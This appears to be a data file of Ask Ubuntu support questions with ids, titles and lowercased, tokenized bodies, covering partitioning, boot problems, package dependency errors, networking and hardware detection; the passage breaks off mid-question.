340400	ubuntu preseed partman gets partition type and size wrong	i want to write a partman recipe in my ubuntu 12.04 server installer preseed file to partiton my disk . i want it to make the following partitions : bios boot area for supporting gpt type partition tables , 32mb root file system , ext4 , 30 gb /data , ext4 , remaining space swap , 24 gb ( 3*ram ) the first three partitions are created , the last one is not and the swap space is wrong too . i get the following on a 4tb drive : bios boot area for supporting gpt type partition tables , 32mb root file system , ext4 , 30 gb one 100 gb partition of type 0700 , `` microsoft basic data '' swap , 23gb so my questions are : why is the type of partition 3 wrong ? why does partition 3 not fill the rest of the drive ? here is my recipe as it looks now : d-i partman-auto/expert_recipe string \ boot-root : : \ 32 32 32 free \ $ gptonly { } \ $ primary { } \ $ bios_boot { } \ method { biosgrub } \ . \ 500 10000 30720 ext4 \ $ primary { } $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { / } \ . \ 500 10000 -1 ext4 \ $ primary { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /data } \ . \ 64 10000 24576 linux-swap \ method { swap } format { } \ . \ i 've tried reordering the partitions in the recipe , but no luck .
340405	operating system not found	i have uninstalled ubuntu 12.04 and installed ubuntu 13.04 instead . it told me that ubuntu is installed and that i need to restart my pc . after restarting i got an error message that said : operating system not found . how can i fix this ?
340406	bacula backup service	i have been given a project to install bacula and backup a linux ubuntu system . can someone help me with the step by step commands and explanation on how to install bacula ? how to backup then how to crash test it and lastly back it up again ?
340407	how to remove workspace switcher icon from launcher without disabling workspaces ?	i use multiple workspaces , but only through the keyboard commands , so the workspace switcher icon is just taking up space on the launcher for me . ways of removing it ( moving to the trash , checkbox in the appearances menu ) also disable workspaces , which i do n't want to happen . can i keep workspaces enabled , but remove the icon ?
340408	no boot menu on restart	i used wubi to install ubuntu 12.10 but after restarting the computer i do not get a boot menu to start ubuntu . window starts automatically . how do i get the boot menu ?
340410	cmd login page is not displaying	i have configured raid 1 and installed ubuntu 13.04 on my ibm server . after the installation and rebooting , the login screen is not appearing , and it is going to pre-boot analysis page . i do n't know how to get to the login screen by typing a command at the command prompt . please help me .
340416	unmet dependencies installing gnome-shell-extension-weather	when i want to install anything with the apt-get i get an error.for example : amin @ amin-pc : ~ $ sudo apt-get install gnome-shell-extension-weather [ sudo ] password for amin : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gnome-shell-extension-weather : depends : seed but it is not going to be installed libgtk-3-0 : depends : libwayland-client0 ( > = 1.1.90 ) but it is not going to be installed depends : libwayland-cursor0 ( > = 1.1.90 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . amin @ amin-pc : ~ $ then i tried : amin @ amin-pc : ~ $ su - password : root @ amin-pc : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : java-wrappers p7zip use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libwayland-client0 libwayland-cursor0 the following new packages will be installed : libwayland-client0 libwayland-cursor0 0 upgraded , 2 newly installed , 0 to remove and 226 not upgraded . 26 not fully installed or removed . need to get 0 b/36.7 kb of archives . after this operation , 155 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 208142 files and directories currently installed . ) unpacking libwayland-client0 : amd64 ( from ... /libwayland-client0_1.2.0-0ubuntu1~13.04~ricotz0_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libwayland-client0_1.2.0-0ubuntu1~13.04~ricotz0_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/libwayland-client.so.0.1.0 ' , which is also in package libwayland0 : amd64 1.0.5-0ubuntu1 no apport report written because maxreports is reached already unpacking libwayland-cursor0 : amd64 ( from ... /libwayland-cursor0_1.2.0-0ubuntu1~13.04~ricotz0_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libwayland-cursor0_1.2.0-0ubuntu1~13.04~ricotz0_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/libwayland-cursor.so.0.0.0 ' , which is also in package libwayland0 : amd64 1.0.5-0ubuntu1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libwayland-client0_1.2.0-0ubuntu1~13.04~ricotz0_amd64.deb /var/cache/apt/archives/libwayland-cursor0_1.2.0-0ubuntu1~13.04~ricotz0_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ amin-pc : ~ # how can i fix it ?
340421	no sound through hdmi	i noticed that i ca n't send sound to my television when i connect my laptop to my tv through hdmi . i noticed that the hdmi is recognised , but i ca n't select it . i tried setting a profile to it , by using `` pulseaudio volume control '' but no luck ( image at the bottom of the post ) . here is the output from aplay -l : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 the device is an acer aspire 7750g with specs : amd radeonâ˘ hd 6650m i7-2630m i am using this driver : so what am i to do next ? thanks in advance .
340424	canopy express in ubuntu 12.04 32-bit does n't start	i installed the 32-bit version of canopy express in my ubuntu 12.04 32-bit machine . i followed the installation guides here . then when i run the program i get the following dialogue : permission denied . please change the permissions and restart canopy . i tried to run the program using sudo , but it did n't work . any idea on how to solve this problem ?
340426	the system is running low graphic mode just after updates installed	i had ubuntu linux v 12 . i installed .deb `` update packages '' from a folder that include all packages and i downloaded them before . just after installing them using dpkg -i *.deb command and restarting the computer , the computer loads on low graphic mode ! my graphic card : ati radeon-hd 3600 i can give you the name of packages i installed . after this problem , i removed ubuntu , but i really need it , so i need to be sure it will work correctly if i install it again .
340427	gnome shell battery indicator shows 2 batteries	i 'm running ubuntu 13.04 gnome edition with gnome shell 3.8 . the battery status indicator menu ( the one that appears when clicking the battery icon on top bar ) shows me two batteries whereas i only have one installed ( dell xps 13 ) . the first battery seems to actually refer to my battery , the second is often shown as empty and the recharging symbol appears ( lightning ) even if nothing is actually recharging . why ? how can i get rid of this ? thanks .
340428	running a php script in apache webserver	i have created a php script and saved it as script.php , located in the /var/www directory . i also have index.html file which has a form which requires the user to enter a value and submit with the code < html > < body > < form action= '' script.php '' method= '' post '' > name < input type= '' text name= '' fname '' '' > < input type= '' submit '' > < /form > < /body > < /html > for testing purposes , i have set my script.php file to be like < ? php echo `` could not read name '' ; ? > when i enter the url on the browser , i get the form and on clicking submit , it responds by saying the url http : //localhost/script.php was not found . i would like to know the reason why this is so . the question extends to why i can run the php script on its own when i move it from /var/www to home folder and run it as php -f script.php yet when i paste the url http : //localhost/script.php , it reports that the url has not been found
340431	how to create a bootable usb stick with linux-secure 13.04 ?	how can i produce a bootable ubuntu live usb stick using the file : `` linux-secure-13.04-64bit.iso '' . i successfully created a stick with `` ubuntu-13.04-desktop-amd64 '' , as this distribution is listed in the usb installer unlike the `` linux-secure '' . thanks for help ! ! ! !
340432	can i get the bookmark button back into the bookmarks bar in firefox ?	i usually had a bookmarks button in my bookmarks bar to have quick access to those bookmarks that did not fit into the bar itself . since firefox 23 , it is not displayed anymore , only the bookmarks remain . to get access to the bookmarks button , i have to move it into the navigation bar or the addon bar . is there a way to enable it again ? how ?
340436	ubuntu not showing in windows 7 boot manager	i installed ubuntu 13.04 with a usb flash disk since i did not have a dvd disc . i chose install alongside windows 7 and followed the process . after it had the popup screen with continue testing and restart now , i clicked restart now and removed the flash drive . the pc continued to boot to windows 7 even though it was supposed to pass grub first . i already tried re-installing grub on the ext4 partition but still no luck and it ended up making my windows 7 boot manager unusable too . system : windows 7 ultimate 64-bit 4gb of ram amd a4-5300 ( with amd radeon 7480d igp ) 80 gb hdd space ( 11.9 gb for ubuntu ) gigabyte ga-f2a75m-hd2 tried to install : ubuntu 13.04 amd64
340438	setting up users and permissions for a multi-purpose home server	i have decided to repurpose an old grey box computer to be a combination nas/home media server , headless torrent server , and minecraft server . i am using this both as a practical piece of equipment and as a learning experience with ubuntu and linux . i am having trouble determining the `` best practices '' for setting up such a server in a secure manner . i have read that it is recommended that each different service or task on a server be given a different user , in order to keep things separated from each other . is this true ? i would like this computer to offer the following services : samba and/or nfs ( i will be connecting with mac and windows clients ; should i use only samba , or both ? ) transmission-daemon with watched folders the minecraft server in the future , i may add : plex media server subsonic what would be the proper layout of users and permissions to ensure that , for example , the directory where all my media files live is accessible to all while also keeping each service separated by user account ? thank you in advance !
340439	how can i get older version of flareget ?	i had just updated flareget download manager and it looks like the new version ( 1.5.12 ) allows fewer segments per download than the older one , 1.4.9 ( 4 instead of 8 - while the pro version offers 16 ) . how can i get back the older version ? update : the newer 2.0 version has limited farther the number of segments per download : only 2 for the free version . it looks they are pushing hard their paid version . so , unless buying that , there 's no point in upgrading . v. 2.3-24 allows a max of 16 connection/download but only 2 for a file over 25 mb .
340445	tv channel identification using linux c programming	i need to develop an application which will identify the channel name which is currently running in the television . i am using easy cap video capturing device to take the video in from the dth set top boxes . currently i am used ffmpeg to cut it into frames . then i used tesseract ocr to read the image contents . it does not seems to be perfect . so i need some other method to implement that . can any one help me on implementing this application .
340452	where did my nvidia optimus card go ?	i have an asus ux32vd that has a nvidia 620m card along with the integrated intel graphics . i had ubuntu 13.04 and i could use the nvidia card with bumblebee for some time , then i it stopped working after a kernel or drivers update ( do n't remember ) and i was busy and lazy to fix it and i did n't really missed using the card . then i found there is a partial support from nvidia for the optimus technology but it required newer packages versions , i also checked the nvidia-prime package in saucy-salamander made the setup completely painless so i said , what the.. lets upgrade to 13.10 to test the new feature . i purged bumblebee and everything related to nvidia and once i had my saucy install working i reinstalled the nvidia drivers followed by the nvidia-prime package . now i restart and ... surprise ! ( actually not a surprise , something like this always happens ) no ui , a low graphics mode message and there i am . of course i did n't check before the installation with lspci if i had an optimus capable pc because i have an optimus capable pc but doing lspci or checking in dmeseg output i do n't see any trace of the nvidia word , my card just disapeared . now i do n't know how to fix it or what could be the cause . i can only think of two options , a fairy opened my pc and stole the nvidia chipset while i was sleeping or in the bumblebee time my card got disabled ( bbswitch ? ) and now the system does n't detect it .
340454	large 3 tb external disc mount problem after formating	i have been using an external hdd 3tb for a couple of years now . since it was fat32 i could n't write big files over 4.3 gb on it . so i formatted it to ntfs . i did n't use any partitioning since i only want to store media files on it . first i did copy-paste a large movie file to check if it 's ok and there was no problem . next day i copied a large amount of media files ( about 120gb ) . today when i opened my desktop it could n't mount the hard drive and this message popped up : error mounting /dev/sdg2 at /media/george/3tb1 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdg2 '' `` /media/george/3tb1 '' ' exited with non-zero exit status 13 : error reading bootsector : input/output error failed to mount '/dev/sdg2 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . after running sudo fdisk -l i got this : disk /dev/sdg : 3000.6 gb , 3000592965632 bytes 255 heads , 63 sectors/track , 45600 cylinders , total 732566642 sectors units = sectors of 1 * 4096 = 4096 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x2052474d this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdg1 ? 6579571 1924427647 3376425012 70 disksecure multi-boot /dev/sdg2 ? 1953251627 3771827541 2979336364 43 unknown /dev/sdg3 ? 225735265 225735274 40 72 unknown /dev/sdg4 2642411520 2642463409 207560 0 empty partition table entries are not in disk order i 'm running ubuntu 13.10 and the formatting was done with the default `` disc utility '' programm . when i open it i can see the hard drive but it is not mounted . i also see 4 different partitions on my external hard drive that i did n't do . 1 . free space 112gb 2 . partition 1 871 gb ntfs 3 . partition 2 372 gb ntfs 4 . free space 1.6 tb any help would be much appreciated . after almost a week of searching and formating in different format files i thought that the problem was i had to format the disk as gpt cuase it 's over 2 tb . ok , i did that . i 've made some copy pasting , desktop restarting etc . everything seemed to work fine for one day . today when i tried to acces this hard drive this message poppes up ... again ! error mounting /dev/sdd1 at /media/george/3tb : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdd1 '' `` /media/george/3tb '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdd1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i 've been directed to some other ( supposingly doublicate ) threads but i could n't find a solution . here is the output of dmesg | tail george @ george-ms-7091 : ~ $ dmesg | tail [ 919.249043 ] sd 9:0:0:0 : [ sdd ] 732566642 4096-byte logical blocks : ( 3.00 tb/2.72 tib ) [ 919.251026 ] sd 9:0:0:0 : [ sdd ] no caching mode page present [ 919.251036 ] sd 9:0:0:0 : [ sdd ] assuming drive cache : write through [ 919.295666 ] sdd : sdd1 [ 919.297016 ] sd 9:0:0:0 : [ sdd ] 732566642 4096-byte logical blocks : ( 3.00 tb/2.72 tib ) [ 919.299020 ] sd 9:0:0:0 : [ sdd ] no caching mode page present [ 919.299028 ] sd 9:0:0:0 : [ sdd ] assuming drive cache : write through [ 919.299034 ] sd 9:0:0:0 : [ sdd ] attached scsi disk [ 919.665826 ] ext4-fs ( sdd1 ) : ext4_check_descriptors : checksum for group 3968 failed ( 44912 ! =0 ) [ 919.665833 ] ext4-fs ( sdd1 ) : group descriptors corrupted ! so i did a check with badblocks . after about 5 days it finally finished and no problems were found with all 4 patterns . so i formated it again with gparted ( gpt , ext4 ) and started to copy back files on the disk . i also did some restart several times to my computer . some with unmounting it and some with not unmounting it and everything worked fine . til now ! i did a restart to my desktop ( without unmounting any of my external drives ) . at shut down and start up i noticed a message which showed up for about 2 sec so i ca n't tell you what it said , but it was something like `` could not ... ... ..hid ... '' and at start up something like `` wrong/bad argument ... . /sdd drive ... . '' so the same problem is back again ! only to this drive . could it be that there 's a problem with ubuntu handling large partitions ? i know there are lots of issues online similar to my problem but noone seems to have a clear solution . should i go back to fat32 and back up alla other files that are not over 4gb ? that 's quite a joke though having a 3tb disk that can handle only 4gb files ...
340456	ubuntu 13.04 wireless hotspot problems	i had an ubuntu 12.04 system which i recently upgraded to 13.04 . i thought of trying to create a wireless hotspot that i could use to share my mobile broadband connection with other devices . to that end , i went to the network settings - > wireless settings and pressed the use a hotpost button . but instead of asking me for a name of the hotspot connection and other details ( as i had expected ) , the hotspot straight away asked me to turn the hotspot on . on doing so , i received a notification stating that i was now connected to the hotspot network and almost immediately afterwards it told me that i was disconnected from the network . the wireless network page still showed that i was connected to the specified hotspot . an idea on what might be going on with my system .
340457	i would like to add the following lines to the /etc/apt/sources.list.d	there is a program named `` freedv '' which is a ham radio program that uses the sound card to digitally modulate the voice carrier . to run this program on ubuntu 12.04 , the literature states that one must add the following lines to the /etc/apt/sources.list ( in my computer this file is actually a directly called etc/apt/sources.list.d ) here are the lines to add : deb http : //files.freedv.org/debian/ precise main deb-src http : //files.freedv.org/debian/ precise main how should i go about this ? please let me know .
340461	opening youtube e-mail attachments	how do i open you tube video from link in thunderbird e-mail attachment ?
340462	12.04 cd wo n't boot on my new dell inspiron 15r	my new uefi windows 8 dell 15r will not boot from a live cd . it spins the optical drive like it 's going to boot up , then hangs for a minute and says it ca n't find any bootable media . are there changes i should make in `` bios '' ? uefi is enabled , secure boot is on . i do not want a dual boot system . i want windows 8 to be gone .
340465	ceph status fails due to `` error : missing keyring '' error	i have deployed 3 ceph mon nodes using juju and maas . from juju status all ceph mon nodes are up and fine . but i did ssh into one of the ceph node and was just trying to get ceph status . and its giving me this error , ubuntu @ cs1 : /home/ubuntu # sudo ceph status 2013-09-02 11:01:32.157892 7f8fc3d65780 -1 monclient ( hunting ) : error : missing keyring , can not use cephx for authentication 2013-09-02 11:01:32.157928 7f8fc3d65780 -1 ceph_tool_common_init failed . and then i discovered for any ceph command its giving me same error . before ceph deployment in .yaml file i had sepecifed $ fsid and $ monitor-secret values . so i think juju should take care of keyring , but looks like it does n't . any suggestion ?
340469	trouble connecting to wireless via clear hub express	i 'm currently running ubuntu 12.04 lts . i have never had trouble connecting to wireless signals before . i just moved into a new apartment and got a clear hub express . it hooked up fine and my wife , who uses mac , has connected to the internet with not trouble . while my computer connects to the signal , it will not load any web pages . when i connect to the router via an ethernet cable , i can access the web with no problem . clear 's tech support says they ca n't do anything from their end , and suggested i talk to ubuntu 's support ( this is where you all come in ) . has anyone figured out how to connect to a clear hub express wireless signal via ubuntu ?
340473	is somehow possible to run ubuntu with both graphics ?	is somehow possible to run ubuntu with both graphics cards like in windows ? i tested linux mint and he recognized both graphic cards and at details about my computer it was showing them both , but in ubuntu only shows intel ( integrated ) .i like ubuntu and i wish i could use both cards on it because i need power on video and photo editing . i apologize if the question is stupid , i 'm new in the linux world . my computer ( acer 5755g from 2011 ) details are : procesor : intelâž coreâ˘ i5-2410m cpu @ 2.30ghz ram : 8 gb video : nvidia 540m 2gb and intel ( integrated ) hdd : 650 gb . os : ubuntu 13.04 the 64 bit version .
340476	mac-like search bar in task bar	i like the unity dash and all , but it can take a while to load ( older computer with 1gb ram ) . so i was wondering if it would be possible to create a program in python that puts a search bar ( like on macs ) up in the area as the notification icons so i could quickly search . is this possible , or would it be an absurd amount of work for a little program like this .
340479	i do n't have the option to install ubuntu alongside windows 7 ; which partition can i delete ?	i have a lenovo ideapad running windows 7 and i want to install ubuntu option . i already installed ubuntu on my parents desktop using a boot dvd . when i run to the installation process on my laptop i do n't see the option `` install ubuntu alongside windows 7 '' . i understand it 's because i already have 4 primary partitions . the question is : can i delete one of those without losing data so i can dual boot it ?
340480	how do i boot from a usb drive recognized as fd0 ?	i am trying to boot ubuntu saucy from a usb stick that i created using the startup disk creator tool . however , when i try to boot i just get a message boot error . i also have grub installed on a hard drive , so i tried going to the grub command line ( with c ) and found that grub sees my usb drive as a floppy ( fd0 ) which i guess must be the problem . running ls ( fd0 ) / from the grub prompt lists nothing ( even though there are definitely files there ) and i have found no bios options that allow me to change this behavior in my bios . am i out of luck ? is there anything i can do to boot from this usb stick ? extra info : my motherboard is a gigabyte ga-m57sli-s4 .
340481	how do i install flash ?	my friend has installed ubuntu but i know nothing about the system and she is no longer around . how do i install an application that would allow me to view things on youtube , netflix or things like tennis streaming on the net or in general viewing anything video wise ? it keeps asking me for plug-ins and then wo n't let me to download anything . also , can i download microsoft internet explorer to replace mozilla firefox ? any help would be appreciated .
340483	problems uninstalling netbeans 7.3.1 on ubuntu 12.04	i am having problems trying to uninstall netbeans 7.3.1 on ubuntu 12.04 . when i run the uninstaller , it shows the message : can not create local directory : /root/.nbi someone knows how to solve this ?
340494	unable to download torrents when using a vpn	i am running ubuntu 13.04 and using openvpn and vpnbook . when i am using a vpn i am unable to download torrents . i have tried it on 3 different torrent clients ( qbittorrent , deluge , and transmission ) . deluge just says `` checking '' and never begins downloading . qbittorrent says `` stalled '' next to the torrent and transmission does not say anything and just does n't download . is there some network setting i am missing or some openvpn config i need to do ?
340496	windows loading instead of ubuntu	i have a windows 8.1 preview ( upgraded from 8 ) on my system . i have one hdd or 1 tb , with one drive 228 gb for ubuntu . i downloaded 13.04 ( 64 bit ) from ubuntu 's site . used pendrivelinux to create a bootable usb . restarted the computer , and booted from usb ( from uefi menu ) . selected try ubuntu without install installed ubuntu made 4 partitions : - boot , root , home and swap . all went well and the prompt came asking me to restart the system . once i clicked the restart button , windows loaded without asking for any os choice . so i restarted the system again went into boot menu , which showed , ubuntu also . selected it and pressed enter , again windows loaded . so i googled a bit and installed easybcd , this is what it said . there are a total of 3 entries listed in the bootloader . default : windows 8.1 preview timeout : 30 seconds easybcd boot device : c : \ entry # 1 name : ubuntu bcd id : { 63712191-130f-11e3-bef6-84a6c82584a5 } device : \device\harddiskvolume1 bootloader path : \efi\ubuntu\grubx64.efi entry # 2 name : efi usb device bcd id : { 0bd5b854-4556-11e2-8925-d4bed9614efa } device : unknown bootloader path : entry # 3 name : windows 8.1 preview bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.efi i tried adding a new entry also as told on many sites , but all in vain . i checked to see if ubuntu is actually installed or not . so when i tried to reinstall ubuntu , it said that it is already installed . so what can i do now ? based upon the suggestion , i installed boot repair . ran boot repair and selected recommended option in boot repair . system said that i need to turn off secure boot . and then completed saying that i can restart . on restart nothing changed with or without the secure boot disabled . that is no boot menu . straight away going to windows . so i logged in again via usb installed boot repair again . ran boot repair in advanced mode , but wit default options checked . system asks me to run a few commands ( 3 ) followed by another command . then says to restart . on restart this time the usb loads itself , as if there is no windows or ubuntu installed . i checked the boot menu and there is no windows or ubuntu . current boot info summary is : http : //paste.ubuntu.com/6059160/ currently i have secure boot off , i guess i t is required to be disabled for dual boot . in advanced boot , the default option selected was sd6 for /boot partition and sd1 for boot/efi partition my boot repair screen is different from your 's . then i went ahead and reinstalled ubuntu ( deleted the previous install ) ubuntu is working fine now . now i need to find a way to bring back windows to life . please suggest how to do that .
340499	ubuntu is not detecting previous os partitions	i have a 2 tb hard disk . i have installed windows 8 in 200 gb space , and leave more 800 gb for it , formatted as ntfs . my idea was to install the ubuntu 13.04 in the left 1 tb . the issue is that the ubuntu installer is showing to me a 2 tb free space - it is not detecting that the hard drive has been already partitioned . what should i do in order to achieve my goal and have ubuntu 13.04 and windows 8 ? edit : i have follow the advice below and open gparted in `` try ubuntu '' mode . it gives me the following question with 'yes/no ' options : /dev/sda contains gpt signatures indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted - possible by a program that doesn't understand gpt partition tables . or perhaps , you deleted the gpt table , and are now using un msdos partition table . is this a gpt partion table ?
340501	can detect wifi , but not my wifi	ubuntu ( i am using 13.04 ) can detect many wifi networks , but not mine . i do n't know why or how to fix it . i have many other devices that are connected to my wifi ( called elvis ) . i have connected to several networks using ubuntu before . can someone please help me connect to elvis ?
340503	ubuntu 12.04 installation take too much time	i downloaded the ubuntu 12.04 source from official ubuntu site and after i try to install it by selecting the wubi.exe , after the selecting the disk space and that , it downloading `` amd64.tar.xz `` file.it shows remaining time approximately 17h 30m , and this process continues since last 2 hours ... i downloaded and mounted the iso to install the 64 bit wubi , but every time i run it it gets stuck on `` downloading ubuntu-12.04.2-wubi-amd64.tar.xz . and yeah , there is nothing wrong with internet connection what should i do ? should i stop the installation process and leave it as it is.. ?
340506	is there any command-line rss feed file grabber ?	i 'm looking for a command-line program for downloading files from a rss feed . when i run this program , it should go to a rss webpage , check whether there are new episodes , and if so , download them .
340508	vpn connection problem with vpnc	i was able to work through the vpn using network-manager-vpnc without any problem but suddenly it stopped working . this is a snippet caught from my syslog : sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > starting vpn service 'vpnc ' ... sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > vpn service 'vpnc ' started ( org.freedesktop.networkmanager.vpnc ) , pid 16516 sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > vpn service 'vpnc ' appeared ; activating connections sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > vpn plugin state changed : starting ( 3 ) sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > vpn connection 'abcxyz ' ( connect ) reply received . sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) : no ifupdown configuration found . sep 2 10:58:19 chachan-thinkpad-l420 networkmanager [ 1130 ] : < warn > /sys/devices/virtual/net/tun0 : could n't determine device driver ; ignoring ... sep 2 10:58:34 chachan-thinkpad-l420 avahi-daemon [ 1085 ] : withdrawing workstation service for tun0 . sep 2 10:58:34 chachan-thinkpad-l420 networkmanager [ 1130 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) sep 2 10:58:34 chachan-thinkpad-l420 networkmanager [ 1130 ] : < warn > vpn plugin failed : 1 sep 2 10:58:34 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > vpn plugin state changed : stopped ( 6 ) sep 2 10:58:34 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > vpn plugin state change reason : 0 sep 2 10:58:34 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > policy set 'wirelesslink ' ( wlan0 ) as default for ipv4 routing and dns . sep 2 10:58:34 chachan-thinkpad-l420 networkmanager [ 1130 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . sep 2 10:58:39 chachan-thinkpad-l420 networkmanager [ 1130 ] : < info > vpn service 'vpnc ' disappeared i tried rebooting , restarting wireless and restarting networking . any idea what else i could test or do ? . thanks in advance !
340511	passwd file deleted in ubuntu	i was recently making some researches about the passwd file , and out of curiosity i deleted it , after i deleted it my computer froze , and after a hard reboot it doesnt boot . i found a solution on this site but it had to do with restoring a backup of the deleted file . so on my own accord i ran a live-cd and copied passwd- as the new passwd file , now the computer boots to the login screen but the screen keeps flicking with a black boot screen . please i need your help , i have several works on hold for the past 2 days . thank you . p.s i am using ubuntu 13.04
340512	question about ip address on virtualbox for a home server	i have set up a lamp server within a virtualbox partition using the ubuntu automatic install . this is the first time i have tried to set up a home server . the installation seems to have been successful and now i am trying to understand my internet connection . if i ping google , i get 64 bytes from 67.215.66.132 ... ( in fact , i get this over and over until i stop it ) . that seems promising . however , when i run ifconfig , it returns inet addr : 10.0.2.15 . i 'm not sure what kind of address this is . maybe a local network address ? it is not an address , i can access from a browser so i am not sure if my server is accessible from the outside . the server is connected via ethernet to a uverse router . ultimately , i want to try to host a single website on this server but i am wondering if i have to make more adjustments to my ip address before proceeding . any feedback on the above would be appreciated . thanks
340514	mounting a windows folder with writing permissions in ubuntu	apparently the answer is here : http : //superuser.com/questions/251537/mount-specific-ntfs-directory-on-linux however it is not working as expected . i have a dual boot system with windows 7 and ubuntu 13.04 ( upgraded from 12.10 ) , and i want to access my windows 7 personal folders for both reading and writing . i followed instructions according to the given link and my /etc/fstab file looks like this : /dev/sda1 /media/windows ntfs ro , umask=0222 , defaults 0 0 /media/windows/users/myuser/ /home/myuser/windows ntfs-3g rbind , user , umask=0222 , defaults 0 0 /media/windows/users/otheruser/ /home/otheruser/windows ntfs-3g rbind , user , umask=0222 , defaults 0 0 it almost works as expected . my windows partition is on /media/windows/ with read-only permissions and my windows personal folder is in ~/windows . however this personal folder is also read-only . note i 'm configuring this in a multisession environment , so i need this to work for my session and for other user 's sessions . i need that each user can access and be able to write and read their windows folders from linux .
340517	how do i enable all four cores on my toshiba p70-a notebook ? ( only one enabled now )	i recently noticed my computer is highly sluggish ( recent install of kubuntu 13.04 by the way ) . i have a toshiba satellite p70-a psplpc-01y007 laptop with an intel i7 quad-core , 16 gb of ram . it appears to look correct in the kinfo . so i ran mpstat -p all : linux 3.8.0-30-generic ( isogen ) 13-09-02 _x86_64_ ( 1 cpu ) 10:07:13 am cpu % usr % nice % sys % iowait % irq % soft % steal % guest % idle 10:07:13 am all 11.07 3.02 2.90 36.25 0.00 0.12 0.00 0.00 46.64 10:07:13 am 0 11.07 3.02 2.90 36.25 0.00 0.12 0.00 0.00 46.64 i noticed when i had chrome open with 10 tabs , typical of an engineer , but it kept freezing horribly . after i ran top , i realized the cpu kept hitting 100 % and only one cpu/core is listed . could n't find a solution so far . how can i get it to register all 4 cores ? cat /proc/cpuinfo | grep -e `` ( core|model\ name ) '' model name : intel ( r ) core ( tm ) i7-4700mq cpu @ 2.40ghz core id : 0 cpu cores : 1 as well as sudo grep -i smp /var/log/syslog sep 2 10:02:41 isogen kernel : [ 0.000000 ] linux version 3.8.0-30-generic ( buildd @ roseapple ) ( gcc version 4.7.3 ( ubuntu/linaro 4.7.3-1ubuntu1 ) ) # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 ( ubuntu 3.8.0-30.44-generic 3.8.13.6 ) sep 2 10:02:41 isogen kernel : [ 0.000000 ] found smp mp-table at [ mem 0x000fe1b0-0x000fe1bf ] mapped at [ ffff8800000fe1b0 ] sep 2 10:02:41 isogen kernel : [ 0.000000 ] smpboot : allowing 1 cpus , 0 hotplug cpus sep 2 10:02:41 isogen kernel : [ 0.010390 ] freeing smp alternatives : 24k freed sep 2 10:02:41 isogen kernel : [ 0.062244 ] smpboot : cpu0 : intel ( r ) core ( tm ) i7-4700mq cpu @ 2.40ghz ( fam : 06 , model : 3c , stepping : 03 ) sep 2 10:02:41 isogen kernel : [ 0.063005 ] smpboot : total of 1 processors activated ( 4788.97 bogomips ) sep 2 11:18:52 isogen kernel : [ 0.000000 ] linux version 3.8.0-30-generic ( buildd @ roseapple ) ( gcc version 4.7.3 ( ubuntu/linaro 4.7.3-1ubuntu1 ) ) # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 ( ubuntu 3.8.0-30.44-generic 3.8.13.6 ) sep 2 11:18:52 isogen kernel : [ 0.000000 ] found smp mp-table at [ mem 0x000fe1b0-0x000fe1bf ] mapped at [ ffff8800000fe1b0 ] sep 2 11:18:52 isogen kernel : [ 0.000000 ] smpboot : allowing 1 cpus , 0 hotplug cpus sep 2 11:18:52 isogen kernel : [ 0.010393 ] freeing smp alternatives : 24k freed sep 2 11:18:52 isogen kernel : [ 0.062271 ] smpboot : cpu0 : intel ( r 